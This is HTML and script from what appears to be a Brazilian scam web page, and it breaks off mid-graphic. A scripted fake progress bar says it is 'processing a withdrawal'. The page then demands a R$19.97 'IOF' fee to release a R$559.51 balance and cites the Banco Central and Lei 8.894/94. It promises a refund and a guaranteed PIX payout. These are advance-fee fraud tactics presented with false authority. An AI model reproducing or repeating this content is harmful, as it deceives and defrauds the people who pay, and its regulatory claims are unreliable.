					<div id="preloader-fake" style="opacity: 0; visibility: hidden;"></div>
<div id="loading-page" style="visibility: visible; opacity: 1;">
  <div class="status-text" id="status-text" style="opacity: 0; transform: translateY(20px);">Quase lá! Falta apenas um passo.</div>
  <div class="progress-bar">
    <div class="progress-bar-fill" id="progress-bar-fill"></div>
  </div>
</div>

<script>
document.addEventListener('DOMContentLoaded', function() {
  var preloaderFake = document.getElementById("preloader-fake");
  var loadingPage = document.getElementById("loading-page");
  var statusText = document.getElementById("status-text");
  var progressBarFill = document.getElementById("progress-bar-fill");

  // Função para atualizar o status
  function updateStatus(text, progress) {
    statusText.style.opacity = 0;
    statusText.style.transform = "translateY(20px)";
    
    setTimeout(function() {
      statusText.innerText = text;
      statusText.style.opacity = 1;
      statusText.style.transform = "translateY(0)";
      progressBarFill.style.width = progress + "%";
    }, 300);
  }

  // Sequência de carregamento
  setTimeout(function() {
    preloaderFake.style.opacity = 0;
    preloaderFake.style.visibility = "hidden";
    loadingPage.style.visibility = "visible";
    loadingPage.style.opacity = 1;

    updateStatus("Validando pesquisa", 30);

    setTimeout(function() {
      updateStatus("Processando saque...", 60);
    }, 2000);

    setTimeout(function() {
      updateStatus("Quase lá! Falta apenas um passo...", 100);
    }, 4000);

    setTimeout(function() {
      loadingPage.style.opacity = 0;
      loadingPage.style.visibility = "hidden";
      document.body.style.overflow = "auto";
    }, 5000);
  }, 400);
});
</script>

<style>
  /* Estilo para o preloader fake (sem animação de spin) */
  #preloader-fake {
    position: fixed;
    top: 0;
    left: 0;
    width: 100%;
    height: 100%;
    background-color: white;
    display: flex;
    justify-content: center;
    align-items: center;
    z-index: 9999;
    visibility: visible; /* Inicia visível */
    opacity: 1; /* Inicia com opacidade total */
    transition: opacity 0.5s ease, visibility 0.5s ease; /* Animação para ocultar */
  }

  /* Estilo da página de carregamento após o preloader fake */
  #loading-page {
    position: fixed;
    top: 0;
    left: 0;
    width: 100%;
    height: 100%;
    background-color: #ffffff;
    display: flex;
    flex-direction: column;
    justify-content: flex-end; /* Alinha os itens ao fundo */
    align-items: flex-start; /* Alinha os itens à esquerda */
    padding-left: 20px;
    padding-right: 20px;
    padding-bottom: 100px; /* Espaçamento de 100px na parte inferior */
    z-index: 9998;
    visibility: hidden; /* Inicialmente oculto */
    opacity: 1; /* Opacidade total no início */
    transition: opacity 1s ease, visibility 1s ease; /* Animação de fade out */
  }

  /* Barra de progresso */
  .progress-bar {
    width: 100%;
    height: 8px;
    background-color: #D8D8D8;
    border-radius: 4px;
    margin-top: 48px;
    position: relative;
    overflow: hidden;
  }

  .progress-bar-fill {
    height: 100%;
    width: 0%; /* Começa com 0% */
    background-color: #FE2B54;
    transition: width 2s ease; /* Animação de transição suave para a largura da barra */
  }

  /* Status text */
  .status-text {
    font-family: 'Inter', sans-serif;
    font-weight: 900; /* Fonte mais grossa */
    font-size: 28px;
    color: black;
    margin-top: 48px;
    width: 100%;
    text-align: left; /* Alinhado à esquerda */
    transform: translateY(20px); /* Começa ligeiramente abaixo */
    opacity: 0; /* Começa invisível */
    transition: transform 0.5s ease, opacity 0.5s ease; /* Animação de deslizar para cima */
  }
</style>				</div>
				</div>
					</div>
				</div>
		<div class="elementor-element elementor-element-41ddd526 e-con-full e-flex e-con e-parent e-lazyloaded" data-id="41ddd526" data-element_type="container">
		<div class="elementor-element elementor-element-33f8b68d e-con-full e-flex e-con e-child" data-id="33f8b68d" data-element_type="container" data-settings="{" background_background":"classic"}"="">
				<div class="elementor-element elementor-element-7c47a5da elementor-widget-mobile__width-initial elementor-view-default elementor-widget elementor-widget-icon" data-id="7c47a5da" data-element_type="widget" data-widget_type="icon.default">
				<div class="elementor-widget-container">
							<div class="elementor-icon-wrapper">
			<div class="elementor-icon">
			<svg xmlns="http://www.w3.org/2000/svg" width="160" height="37" viewBox="0 0 160 37" fill="none"><path d="M21.1241 10.7151C21.1241 8.57211 24.1418 6.77896 27.9031 6.77896C31.6643 6.77896 34.682 8.52837 34.682 10.7151C34.682 12.8582 31.6643 14.6076 27.9031 14.6076C24.1418 14.6076 21.1241 12.8582 21.1241 10.7151ZM16.182 10.6277C23.9669 15.1761 33.7636 22.6111 38.7494 26.7222L27.9468 37C20.9054 30.1773 15.0887 24.7979 10.6277 20.9492C13.2518 15.7447 15.1761 12.2459 16.182 10.6277ZM16.0508 4.19858C19.8121 4.19858 23.792 4.37352 27.9468 4.67967C21.0804 7.6974 13.7329 11.7648 5.86052 16.9693C3.7175 15.2199 1.74941 13.8203 0 12.6395C5.81679 9.1844 11.1525 6.38535 16.0508 4.19858ZM40.5863 4.50473L39.7116 10.6277C33.9823 7.12884 27.8156 4.32979 21.1679 2.14303C24.3168 1.04965 26.5473 0.349882 27.9031 0C31.708 0.962175 35.9066 2.49291 40.5863 4.50473ZM27.9468 18.4125C34.4196 13.7329 40.2802 9.9279 46.1844 7.21631C48.8523 8.52837 52.0887 10.3215 55.8499 12.5957C52.0887 15.2199 48.2837 18.1939 44.4787 21.5615C39.2305 20.3369 32.9764 19.156 27.9468 18.4125Z" fill="white"></path><path d="M58.5178 24.9289H61.4481V19.8993C62.4977 19.8993 62.8913 19.8993 63.3724 21.605L64.3346 24.9289H67.3961L66.1277 20.8615C65.6467 19.3745 65.2968 18.8934 64.3783 18.7622C66.7838 18.2374 66.8712 16.1819 66.8712 15.657C66.8712 13.3391 65.1218 12.4644 63.0663 12.4644H58.5178V24.9289ZM61.3169 14.5636H62.1916C63.766 14.5636 63.941 15.6133 63.941 16.1381C63.941 17.0128 63.3724 17.8001 62.2353 17.8001H61.3169V14.5636ZM81.9162 22.9608C81.4351 23.1358 80.954 23.092 80.3854 23.092C79.3795 23.092 78.2424 22.5235 78.2424 20.6866C78.2424 20.3367 78.2424 18.1499 80.2542 18.1499C80.8228 18.1499 81.2164 18.1499 81.785 18.2374L81.9162 16.2693C81.0415 16.1818 80.6916 16.1381 79.8169 16.1381C77.0616 16.1381 75.5308 18.0187 75.5308 20.6866C75.5308 22.261 76.2743 25.0601 79.5982 25.0601C80.4292 25.0601 81.2164 25.1476 81.9599 24.9289L81.9162 22.9608ZM90.3571 14.7823H92.9812V12.4644H90.3571V14.7823ZM134.486 12.4644H131.862V17.5376C131.512 16.7504 130.812 16.1381 129.588 16.1381C127.401 16.1381 126.526 18.0625 126.526 20.3804C126.526 23.1358 127.619 25.0601 129.588 25.0601C131.075 25.0601 131.687 24.0979 131.949 23.5294C131.993 24.1417 132.037 24.579 132.037 24.9289H134.53C134.486 24.5353 134.486 24.0979 134.486 23.0045V12.4644ZM129.325 20.5991C129.325 19.2433 129.413 17.9313 130.593 17.9313C131.643 17.9313 131.906 19.2433 131.906 20.5991C131.906 21.605 131.687 23.1795 130.593 23.1795C129.369 23.1795 129.325 21.5176 129.325 20.5991ZM143.408 24.9289H146.032V21.0802C146.032 19.8119 146.207 18.4998 147.738 18.4998H148.612V16.3131H148.219C146.688 16.3131 146.338 16.9254 145.813 17.8875C145.77 17.3627 145.726 16.8379 145.726 16.3131H143.32C143.364 16.7504 143.364 17.2752 143.364 18.1062V24.9289H143.408ZM157.01 24.9289H159.634V12.4644H157.01V24.9289ZM111.437 24.9289H114.237V19.7244H118.173V17.5376H114.237V14.6511H118.304V12.4644H111.394V24.9289H111.437ZM149.312 18.4561C150.362 18.0187 151.149 17.9313 151.805 17.9313C152.199 17.9313 153.423 17.8438 153.423 19.5057H152.636C151.718 19.5057 148.35 19.5057 148.35 22.436C148.35 24.0105 149.4 25.0601 151.018 25.0601C152.242 25.0601 153.292 24.2729 153.38 23.748L153.467 24.9289H155.872C155.829 24.3603 155.829 23.748 155.829 22.4797V19.3308C155.829 17.4064 155.129 16.1381 152.067 16.1381C151.105 16.1381 150.187 16.2693 149.312 16.2693V18.4561ZM153.423 21.2551C153.423 23.3544 152.111 23.3982 151.849 23.3982C151.63 23.3982 150.712 23.3982 150.712 22.2611C150.712 20.8178 152.374 20.7303 153.423 20.7303V21.2551ZM69.8452 19.8556C69.8452 19.3745 69.8452 17.7126 71.201 17.7126C72.2944 17.7126 72.5568 18.7622 72.5568 19.8556H69.8452ZM74.9185 20.6428C74.9185 16.1381 71.9445 16.1381 71.1573 16.1381C68.6644 16.1381 67.3086 18.2374 67.3086 20.5554C67.3086 23.1795 68.6644 25.0601 71.6821 25.0601C72.5568 25.0601 73.5627 25.1038 74.4374 24.9289L74.3937 22.9608C73.519 23.267 72.863 23.267 71.9445 23.267C70.4575 23.267 69.8015 22.3048 69.8015 21.2989H74.9185V20.6428ZM84.5403 19.8556C84.5403 19.3745 84.5403 17.7126 85.8961 17.7126C86.9895 17.7126 87.2519 18.7622 87.2519 19.8556H84.5403ZM89.6136 20.6428C89.6136 16.1381 86.6396 16.1381 85.8523 16.1381C83.3594 16.1381 82.0036 18.2374 82.0036 20.5554C82.0036 23.1795 83.3594 25.0601 86.3772 25.0601C87.2956 25.0601 88.2578 25.1038 89.1325 24.9289L89.0888 22.9608C88.214 23.267 87.558 23.267 86.6396 23.267C85.1526 23.267 84.4966 22.3048 84.4966 21.2989H89.6136V20.6428ZM120.928 19.8556C120.928 19.3745 120.928 17.7126 122.284 17.7126C123.377 17.7126 123.64 18.7622 123.64 19.8556H120.928ZM126.045 20.6428C126.045 16.1381 123.071 16.1381 122.284 16.1381C119.791 16.1381 118.435 18.2374 118.435 20.5554C118.435 23.1795 119.791 25.0601 122.809 25.0601C123.683 25.0601 124.689 25.1038 125.564 24.9289L125.52 22.9608C124.645 23.267 123.989 23.267 123.071 23.267C121.584 23.267 120.928 22.3048 120.928 21.2989H126.045V20.6428ZM137.635 19.8556C137.635 19.3745 137.635 17.7126 138.991 17.7126C140.084 17.7126 140.346 18.7622 140.346 19.8556H137.635ZM142.752 20.6428C142.752 16.1381 139.778 16.1381 138.991 16.1381C136.498 16.1381 135.142 18.2374 135.142 20.5554C135.142 23.1795 136.498 25.0601 139.515 25.0601C140.434 25.0601 141.396 25.1038 142.271 24.9289L142.227 22.9608C141.352 23.267 140.696 23.267 139.778 23.267C138.291 23.267 137.635 22.3048 137.635 21.2989H142.752V20.6428ZM100.547 18.4561C101.597 18.0187 102.384 17.9313 103.04 17.9313C103.434 17.9313 104.658 17.8438 104.658 19.5057H103.871C102.953 19.5057 99.5852 19.5057 99.5852 22.436C99.5852 24.0105 100.635 25.0601 102.253 25.0601C103.521 25.0601 104.527 24.2729 104.615 23.748L104.702 24.9289H107.108C107.064 24.3603 107.02 23.748 107.02 22.4797V19.3308C107.02 17.4064 106.32 16.1381 103.303 16.1381C102.341 16.1381 101.422 16.2693 100.547 16.2693V18.4561ZM104.658 21.2551C104.658 23.3544 103.346 23.3982 103.084 23.3982C102.865 23.3982 101.947 23.3982 101.947 22.2611C101.947 20.8178 103.609 20.7303 104.615 20.7303V21.2551H104.658ZM90.3571 24.9289V16.2693H94.9055V14.4762L97.4859 13.6452V16.2256H99.1916V18.0625H97.4859V22.0424C97.4859 22.8733 97.8795 23.1358 98.3606 23.1358C98.7105 23.1358 98.9729 23.0483 99.2353 22.9608V24.8852C98.9729 24.9726 98.2731 25.0164 97.3984 25.0164C96.0427 25.0164 94.8618 24.3603 94.8618 22.4797V18.1062H93.0249V24.9289H90.3571Z" fill="white"></path></svg>			</div>
		</div>
						</div>
				</div>
				</div>
		<div class="elementor-element elementor-element-32b2c76f e-con-full e-flex e-con e-child" data-id="32b2c76f" data-element_type="container">
		<div class="elementor-element elementor-element-60374b92 e-flex e-con-boxed e-con e-child" data-id="60374b92" data-element_type="container">
					<div class="e-con-inner">
		<div class="elementor-element elementor-element-38d94bc5 e-con-full e-flex e-con e-child" data-id="38d94bc5" data-element_type="container" data-settings="{" background_background":"classic"}"="">
				<div class="elementor-element elementor-element-4299b1c7 elementor-widget-mobile__width-initial elementor-view-default elementor-widget elementor-widget-icon" data-id="4299b1c7" data-element_type="widget" data-widget_type="icon.default">
				<div class="elementor-widget-container">
							<div class="elementor-icon-wrapper">
			<div class="elementor-icon">
			<svg aria-hidden="true" class="e-font-icon-svg e-fas-exclamation-triangle" viewBox="0 0 576 512" xmlns="http://www.w3.org/2000/svg"><path d="M569.517 440.013C587.975 472.007 564.806 512 527.94 512H48.054c-36.937 0-59.999-40.055-41.577-71.987L246.423 23.985c18.467-32.009 64.72-31.951 83.154 0l239.94 416.028zM288 354c-25.405 0-46 20.595-46 46s20.595 46 46 46 46-20.595 46-46-20.595-46-46-46zm-43.673-165.346l7.418 136c.347 6.364 5.609 11.346 11.982 11.346h48.546c6.373 0 11.635-4.982 11.982-11.346l7.418-136c.375-6.874-5.098-12.654-11.982-12.654h-63.383c-6.884 0-12.356 5.78-11.981 12.654z"></path></svg>			</div>
		</div>
						</div>
				</div>
				<div class="elementor-element elementor-element-3fb4bc08 elementor-widget elementor-widget-heading" data-id="3fb4bc08" data-element_type="widget" data-widget_type="heading.default">
				<div class="elementor-widget-container">
					<h2 class="elementor-heading-title elementor-size-default">Imposto sobre Operações Financeiras (IOF)</h2>				</div>
				</div>
				</div>
					</div>
				</div>
				</div>
		<div class="elementor-element elementor-element-20ba7a98 e-flex e-con-boxed e-con e-child" data-id="20ba7a98" data-element_type="container">
					<div class="e-con-inner">
				<div class="elementor-element elementor-element-22e30ec3 elementor-widget elementor-widget-heading" data-id="22e30ec3" data-element_type="widget" data-widget_type="heading.default">
				<div class="elementor-widget-container">
					<h2 class="elementor-heading-title elementor-size-default">Pagamento do IOF Obrigatório para Liberação do Saldo Acumulado</h2>				</div>
				</div>
					</div>
				</div>
		<div class="elementor-element elementor-element-1929bc5f e-flex e-con-boxed e-con e-child" data-id="1929bc5f" data-element_type="container">
					<div class="e-con-inner">
				<div class="elementor-element elementor-element-18b348b5 elementor-widget elementor-widget-heading" data-id="18b348b5" data-element_type="widget" data-widget_type="heading.default">
				<div class="elementor-widget-container">
					<h2 class="elementor-heading-title elementor-size-default">Para liberar o valor acumulado de R$559.51, é necessário o pagamento do (IOF) no valor de R$19.97.</h2>				</div>
				</div>
					</div>
				</div>
		<div class="elementor-element elementor-element-6c6a6c6e e-flex e-con-boxed e-con e-child" data-id="6c6a6c6e" data-element_type="container">
					<div class="e-con-inner">
				<div class="elementor-element elementor-element-4c1e2c71 elementor-widget elementor-widget-heading" data-id="4c1e2c71" data-element_type="widget" data-widget_type="heading.default">
				<div class="elementor-widget-container">
					<h2 class="elementor-heading-title elementor-size-default"><span style="color: #FF0000">* </span>Conforme exigido pelo Banco Central do Brasil (Lei nº 8.894/94), o pagamento do (IOF) é obrigatório para a liberação do saldo acumulado. O valor será reembolsado automaticamente junto com o saldo.</h2>				</div>
				</div>
					</div>
				</div>
		<div class="elementor-element elementor-element-378681d4 e-flex e-con-boxed e-con e-child" data-id="378681d4" data-element_type="container">
					<div class="e-con-inner">
		<div class="elementor-element elementor-element-51cf3093 e-flex e-con-boxed e-con e-child" data-id="51cf3093" data-element_type="container">
					<div class="e-con-inner">
		<div class="elementor-element elementor-element-74328b09 e-con-full e-flex e-con e-child" data-id="74328b09" data-element_type="container" data-settings="{" background_background":"classic"}"="">
		<div class="elementor-element elementor-element-7918608d e-con-full e-flex e-con e-child" data-id="7918608d" data-element_type="container">
				<div class="elementor-element elementor-element-bb64829 elementor-widget elementor-widget-heading" data-id="bb64829" data-element_type="widget" data-widget_type="heading.default">
				<div class="elementor-widget-container">
					<h2 class="elementor-heading-title elementor-size-default">Resumo</h2>				</div>
				</div>
				</div>
		<div class="elementor-element elementor-element-5ce15048 e-con-full e-flex e-con e-child" data-id="5ce15048" data-element_type="container">
				<div class="elementor-element elementor-element-34c9519c elementor-widget-divider--view-line elementor-widget elementor-widget-divider" data-id="34c9519c" data-element_type="widget" data-widget_type="divider.default">
				<div class="elementor-widget-container">
							<div class="elementor-divider">
			<span class="elementor-divider-separator">
						</span>
		</div>
						</div>
				</div>
				</div>
		<div class="elementor-element elementor-element-75c8980e e-con-full e-flex e-con e-child" data-id="75c8980e" data-element_type="container">
				<div class="elementor-element elementor-element-6c8d217c elementor-widget elementor-widget-heading" data-id="6c8d217c" data-element_type="widget" data-widget_type="heading.default">
				<div class="elementor-widget-container">
					<h2 class="elementor-heading-title elementor-size-default">Valor ganho</h2>				</div>
				</div>
				<div class="elementor-element elementor-element-21d5b392 elementor-widget elementor-widget-heading" data-id="21d5b392" data-element_type="widget" data-widget_type="heading.default">
				<div class="elementor-widget-container">
					<h2 class="elementor-heading-title elementor-size-default">R$559.51</h2>				</div>
				</div>
				</div>
		<div class="elementor-element elementor-element-75518f6 e-con-full e-flex e-con e-child" data-id="75518f6" data-element_type="container">
				<div class="elementor-element elementor-element-3d79573b elementor-widget-divider--view-line elementor-widget elementor-widget-divider" data-id="3d79573b" data-element_type="widget" data-widget_type="divider.default">
				<div class="elementor-widget-container">
							<div class="elementor-divider">
			<span class="elementor-divider-separator">
						</span>
		</div>
						</div>
				</div>
				</div>
		<div class="elementor-element elementor-element-5f5f891b e-con-full e-flex e-con e-child" data-id="5f5f891b" data-element_type="container">
				<div class="elementor-element elementor-element-2b94cfd6 elementor-widget elementor-widget-heading" data-id="2b94cfd6" data-element_type="widget" data-widget_type="heading.default">
				<div class="elementor-widget-container">
					<h2 class="elementor-heading-title elementor-size-default">Valor a ser pago (IOF)</h2>				</div>
				</div>
				<div class="elementor-element elementor-element-39a87858 elementor-widget elementor-widget-heading" data-id="39a87858" data-element_type="widget" data-widget_type="heading.default">
				<div class="elementor-widget-container">
					<h2 class="elementor-heading-title elementor-size-default">- R$19.97</h2>				</div>
				</div>
				</div>
		<div class="elementor-element elementor-element-64f68652 e-con-full e-flex e-con e-child" data-id="64f68652" data-element_type="container">
				<div class="elementor-element elementor-element-71cef7bb elementor-widget elementor-widget-heading" data-id="71cef7bb" data-element_type="widget" data-widget_type="heading.default">
				<div class="elementor-widget-container">
					<h2 class="elementor-heading-title elementor-size-default"></h2><span class="elementor-heading-title elementor-size-default" style="font-size: 14px;">
  *(Reembolsado após Aprovação da Conta e Liberação do Saque)
</span>
				</div>
				</div>
				</div>
		<div class="elementor-element elementor-element-46a35bab e-con-full e-flex e-con e-child" data-id="46a35bab" data-element_type="container">
				<div class="elementor-element elementor-element-7ee7dbc8 elementor-widget-divider--view-line elementor-widget elementor-widget-divider" data-id="7ee7dbc8" data-element_type="widget" data-widget_type="divider.default">
				<div class="elementor-widget-container">
							<div class="elementor-divider">
			<span class="elementor-divider-separator">
						</span>
		</div>
						</div>
				</div>
				</div>
		<div class="elementor-element elementor-element-12215ed7 e-con-full e-flex e-con e-child" data-id="12215ed7" data-element_type="container">
				<div class="elementor-element elementor-element-58baa8bc elementor-widget elementor-widget-heading" data-id="58baa8bc" data-element_type="widget" data-widget_type="heading.default">
				<div class="elementor-widget-container">
					<h2 class="elementor-heading-title elementor-size-default">Total a receber no PIX</h2>				</div>
				</div>
				<div class="elementor-element elementor-element-18f71539 elementor-widget elementor-widget-heading" data-id="18f71539" data-element_type="widget" data-widget_type="heading.default">
				<div class="elementor-widget-container">
					<h2 class="elementor-heading-title elementor-size-default">R$579.48</h2>				</div>
				</div>
				</div>
		<div class="elementor-element elementor-element-1efd81d3 e-con-full e-flex e-con e-child" data-id="1efd81d3" data-element_type="container">
				<div class="elementor-element elementor-element-3a33e172 elementor-widget-mobile__width-initial elementor-view-default elementor-widget elementor-widget-icon" data-id="3a33e172" data-element_type="widget" data-widget_type="icon.default">
				<div class="elementor-widget-container">
							<div class="elementor-icon-wrapper">
			<div class="elementor-icon">
			<svg aria-hidden="true" class="e-font-icon-svg e-fas-exclamation-circle" viewBox="0 0 512 512" xmlns="http://www.w3.org/2000/svg"><path d="M504 256c0 136.997-111.043 248-248 248S8 392.997 8 256C8 119.083 119.043 8 256 8s248 111.083 248 248zm-248 50c-25.405 0-46 20.595-46 46s20.595 46 46 46 46-20.595 46-46-20.595-46-46-46zm-43.673-165.346l7.418 136c.347 6.364 5.609 11.346 11.982 11.346h48.546c6.373 0 11.635-4.982 11.982-11.346l7.418-136c.375-6.874-5.098-12.654-11.982-12.654h-63.383c-6.884 0-12.356 5.78-11.981 12.654z"></path></svg>			</div>
		</div>
						</div>
				</div>
				<div class="elementor-element elementor-element-15f0f349 elementor-widget elementor-widget-heading" data-id="15f0f349" data-element_type="widget" data-widget_type="heading.default">
				<div class="elementor-widget-container">
					<h2 class="elementor-heading-title elementor-size-default">O pagamento de R$579.48 será processado via PIX imediatamente após a confirmação.</h2>				</div>
				</div>
				</div>
				</div>
					</div>
				</div>
					</div>
				</div>
		<div class="elementor-element elementor-element-7c27f7a3 e-flex e-con-boxed e-con e-child" data-id="7c27f7a3" data-element_type="container">
					<div class="e-con-inner">
		<div class="elementor-element elementor-element-7287f5e4 e-flex e-con-boxed e-con e-child" data-id="7287f5e4" data-element_type="container">
					<div class="e-con-inner">
		<div class="elementor-element elementor-element-60622990 e-con-full e-flex e-con e-child" data-id="60622990" data-element_type="container" data-settings="{" background_background":"classic"}"="">
		<div class="elementor-element elementor-element-21efd24 e-con-full e-flex e-con e-child" data-id="21efd24" data-element_type="container">
				<div class="elementor-element elementor-element-4baf2068 elementor-view-default elementor-widget elementor-widget-icon" data-id="4baf2068" data-element_type="widget" data-widget_type="icon.default">
				<div class="elementor-widget-container">
							<div class="elementor-icon-wrapper">
			<div class="elementor-icon">
			<svg aria-hidden="true" class="e-font-icon-svg e-far-check-circle" viewBox="0 0 512 512" xmlns="http://www.w3.org/2000/svg"><path d="M256 8C119.033 8 8 119.033 8 256s111.033 248 248 248 248-111.033 248-248S392.967 8 256 8zm0 48c110.532 0 200 89.451 200 200 0 110.532-89.451 200-200 200-110.532 0-200-89.451-200-200 0-110.532 89.451-200 200-200m140.204 130.267l-22.536-22.718c-4.667-4.705-12.265-4.736-16.97-.068L215.346 303.697l-59.792-60.277c-4.667-4.705-12.265-4.736-16.97-.069l-22.719 22.536c-4.705 4.667-4.736 12.265-.068 16.971l90.781 91.516c4.667 4.705 12.265 4.736 16.97.068l172.589-171.204c4.704-4.668 4.734-12.266.067-16.971z"></path></svg>			</div>
		</div>
						</div>
				</div>
				</div>
		<div class="elementor-element elementor-element-5cbe1333 e-con-full e-flex e-con e-child" data-id="5cbe1333" data-element_type="container">
				<div class="elementor-element elementor-element-1e83ddc3 elementor-widget elementor-widget-heading" data-id="1e83ddc3" data-element_type="widget" data-widget_type="heading.default">
				<div class="elementor-widget-container">
					<h2 class="elementor-heading-title elementor-size-default">Garantia de recebimento</h2>				</div>
				</div>
				</div>
		<div class="elementor-element elementor-element-73b1a392 e-con-full e-flex e-con e-child" data-id="73b1a392" data-element_type="container">
				<div class="elementor-element elementor-element-89a4db7 elementor-widget-divider--view-line elementor-widget elementor-widget-divider" data-id="89a4db7" data-element_type="widget" data-widget_type="divider.default">
				<div class="elementor-widget-container">
							<div class="elementor-divider">
			<span class="elementor-divider-separator">
						</span>
		</div>
						</div>
				</div>
				</div>
		<div class="elementor-element elementor-element-7c162c3b e-con-full e-flex e-con e-child" data-id="7c162c3b" data-element_type="container">
				<div class="elementor-element elementor-element-71129102 elementor-widget-mobile__width-initial elementor-view-default elementor-widget elementor-widget-icon" data-id="71129102" data-element_type="widget" data-widget_type="icon.default">
				<div class="elementor-widget-container">
							<div class="elementor-icon-wrapper">
			<div class="elementor-icon">
			<svg aria-hidden="true" class="e-font-icon-svg e-fas-exclamation-circle" viewBox="0 0 512 512" xmlns="http://www.w3.org/2000/svg"><path d="M504 256c0 136.997-111.043 248-248 248S8 392.997 8 256C8 119.083 119.043 8 256 8s248 111.083 248 248zm-248 50c-25.405 0-46 20.595-46 46s20.595 46 46 46 46-20.595 46-46-20.595-46-46-46zm-43.673-165.346l7.418 136c.347 6.364 5.609 11.346 11.982 11.346h48.546c6.373 0 11.635-4.982 11.982-11.346l7.418-136c.375-6.874-5.098-12.654-11.982-12.654h-63.383c-6.884 0-12.356 5.78-11.981 12.654z"></path></svg>			</div>
		</div>
						</div>
				</div>
				<div class="elementor-element elementor-element-48587a64 elementor-widget elementor-widget-heading" data-id="48587a64" data-element_type="widget" data-widget_type="heading.default">
				<div class="elementor-widget-container">
					<h2 class="elementor-heading-title elementor-size-default">Este processo é regulamentado pelo Banco Central do Brasil. Garantimos que o valor total de R$579.48 será creditado diretamente no seu PIX após o pagamento.</h2>				</div>
				</div>
				</div>
				</div>
					</div>
				</div>
					</div>
				</div>
		<div class="elementor-element elementor-element-310c720d e-flex e-con-boxed e-con e-child" data-id="310c720d" data-element_type="container">
					<div class="e-con-inner">
		<div class="elementor-element elementor-element-799bd3a8 e-flex e-con-boxed e-con e-child" data-id="799bd3a8" data-element_type="container">
					<div class="e-con-inner">
		<div class="elementor-element elementor-element-dc388a5 e-con-full e-flex e-con e-child" data-id="dc388a5" data-element_type="container" data-settings="{" background_background":"classic"}"="">
		<div class="elementor-element elementor-element-17584e3 e-con-full e-flex e-con e-child" data-id="17584e3" data-element_type="container">
				<div class="elementor-element elementor-element-57fcd13e elementor-widget-mobile__width-initial elementor-view-default elementor-widget elementor-widget-icon" data-id="57fcd13e" data-element_type="widget" data-widget_type="icon.default">
				<div class="elementor-widget-container">
							<div class="elementor-icon-wrapper">
			<div class="elementor-icon">
			<svg xmlns="http://www.w3.org/2000/svg" height="886" viewBox="-1.165 -.17395293 238.183 85.60195293" width="2500"><path d="m97.827 78.68v-48.324c0-8.892 7.208-16.1 16.1-16.1l14.268.022c8.865.018 16.043 7.21 16.043 16.076v10.286c0 8.891-7.208 16.1-16.1 16.1h-20.161m40.248-42.49h6.19a6.607 6.607 0 0 1 6.606 6.607v36.099" style="fill:none;stroke:#939598;stroke-width:2.976;stroke-linecap:round;stroke-linejoin:round;stroke-miterlimit:10"></path><path d="m159.695 8.657-2.807-2.807a1.783 1.783 0 0 1 0-2.522l2.805-2.805a1.786 1.786 0 0 1 2.525 0l2.805 2.805a1.783 1.783 0 0 1 0 2.522l-2.806 2.807a1.783 1.783 0 0 1 -2.522 0" fill="#32bcad"></path><path d="m172.895 14.218h6.138c3.158 0 6.186 1.254 8.419 3.487l14.356 14.356a4.762 4.762 0 0 0 6.735 0l14.304-14.304a11.906 11.906 0 0 1 8.418-3.487h4.99m-63.36 42.37h6.138c3.158 0 6.186-1.255 8.419-3.487l14.356-14.357a4.762 4.762 0 0 1 6.735 0l14.304 14.304a11.906 11.906 0 0 0 8.418 3.487h4.99" style="fill:none;stroke:#939598;stroke-width:2.976;stroke-linecap:round;stroke-linejoin:round;stroke-miterlimit:10"></path><path d="m61.233 65.811c-3.08 0-5.977-1.2-8.156-3.376l-11.777-11.778c-.827-.829-2.268-.826-3.094 0l-11.82 11.82a11.463 11.463 0 0 1 -8.156 3.377h-2.321l14.916 14.916c4.658 4.658 12.21 4.658 16.869 0l14.958-14.96zm-43.003-41.656c3.08 0 5.977 1.199 8.156 3.376l11.82 11.822a2.19 2.19 0 0 0 3.094 0l11.777-11.779a11.463 11.463 0 0 1 8.156-3.376h1.419l-14.958-14.959c-4.659-4.658-12.211-4.658-16.87 0l-14.914 14.916z" fill="#32bcad"></path><path d="m75.024 36.57-9.039-9.04c-.199.08-.414.13-.642.13h-4.11a8.123 8.123 0 0 0 -5.706 2.365l-11.776 11.775a5.637 5.637 0 0 1 -3.997 1.654 5.637 5.637 0 0 1 -3.997-1.653l-11.821-11.82a8.121 8.121 0 0 0 -5.706-2.365h-5.054c-.215 0-.417-.05-.607-.122l-9.075 9.076c-4.659 4.658-4.659 12.21 0 16.87l9.075 9.074c.19-.072.392-.122.607-.122h5.054a8.122 8.122 0 0 0 5.706-2.364l11.82-11.82c2.136-2.135 5.86-2.136 7.995 0l11.776 11.776a8.123 8.123 0 0 0 5.706 2.365h4.11c.228 0 .443.05.642.13l9.04-9.04c4.658-4.658 4.658-12.21 0-16.87" fill="#32bcad"></path><path d="m110.097 74.573c-.667 0-1.444.16-2.212.337v2.945c.532.194 1.14.288 1.722.288 1.477 0 2.177-.498 2.177-1.8 0-1.222-.573-1.77-1.687-1.77m-2.71 5.468v-5.823h.406l.042.253c.683-.16 1.628-.371 2.304-.371.549 0 1.072.084 1.51.438.507.415.667 1.08.667 1.806 0 .76-.253 1.478-.945 1.874-.481.27-1.13.38-1.713.38-.6 0-1.173-.093-1.773-.27v1.713zm8.637-5.486c-1.477 0-2.136.465-2.136 1.764 0 1.258.65 1.823 2.136 1.823 1.468 0 2.126-.456 2.126-1.755 0-1.258-.65-1.832-2.126-1.832m1.898 3.587c-.49.354-1.147.456-1.898.456-.768 0-1.427-.11-1.908-.456-.54-.38-.76-1.004-.76-1.788 0-.778.22-1.41.76-1.799.481-.345 1.14-.455 1.908-.455.759 0 1.409.11 1.898.455.55.39.76 1.021.76 1.789 0 .786-.22 1.419-.76 1.798m6.992.338-1.646-3.536h-.034l-1.62 3.536h-.448l-1.755-4.262h.549l1.46 3.578h.034l1.586-3.578h.455l1.63 3.578h.033l1.427-3.578h.531l-1.755 4.262zm5.386-3.933c-1.367 0-1.832.607-1.916 1.486h3.832c-.042-.97-.54-1.486-1.916-1.486m-.017 4.05c-.82 0-1.35-.117-1.772-.472-.498-.43-.667-1.054-.667-1.772 0-.683.228-1.409.793-1.823.473-.329 1.055-.43 1.663-.43.549 0 1.181.059 1.704.414.617.413.735 1.14.735 1.966h-4.372c.017.877.304 1.654 1.958 1.654.785 0 1.52-.127 2.203-.245v.447c-.71.127-1.494.262-2.245.262m3.885-.118v-4.262h.405l.042.253c.903-.227 1.325-.371 2.119-.371h.059v.473h-.119c-.666 0-1.071.092-2.008.337v3.57zm5.517-3.933c-1.367 0-1.831.607-1.916 1.486h3.832c-.042-.97-.54-1.486-1.916-1.486m-.017 4.05c-.819 0-1.35-.117-1.772-.472-.499-.43-.667-1.054-.667-1.772 0-.683.228-1.409.793-1.823.473-.329 